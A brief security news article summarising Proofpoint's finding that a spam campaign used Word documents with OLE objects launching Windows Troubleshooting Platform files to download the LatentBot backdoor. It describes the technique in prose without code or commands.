Proofpoint researchers identified that in a recent spam campaign hackers abused the Windows Troubleshooting Platform (WTP) to spread malware.
Windows Troubleshooting Platform Is the Latest Exploit Nirvana
Security experts from Proofpoint identified a new type of malware infection tactic in a recent spam campaign that used the Windows Troubleshooting Platform (WTP). The Windows Troubleshooting Platform is a service that allows software vendors and system administrators to automate the execution of troubleshooting and repair operations.
The spam campaign delivered infected Microsoft Word documents. When the victim opened them, they are greeted with random characters and a warning displayed on top of the document. The message reads “Document has incorrect encoding: ‘UTF-8’ Double click to auto detect charset”. This is actually an OLE object that launches a DIAGCAB file. This is the file format used by the Windows Troubleshooting Platform. This executes a PowerShell script that triggers the download of a malware payload. These OLE objects can be embedded anywhere in Office documents.
This method is interesting because it bypasses the detection techniques used by many security products. The malicious activity is carried out by the msdt.exe binary which loads the file. According to the security researchers, this is an indication of the trend that malware developers continue to invent new techniques of infection.
The discovered payload is a modular backdoor which is known under the name of LatentBot. It is comprised of several components – main bot engine, remote access plugin, report sending function, security detection capabilities and a hidden VNC instance.
As the trick relies on social engineering most, security-aware users will probably easily evade the malware. There is no major difference between the macro scripts and the troubleshooting ones used by the Windows Troubleshooting Platform. However most security software do not inspect the WTP ones and do not scan them for threats.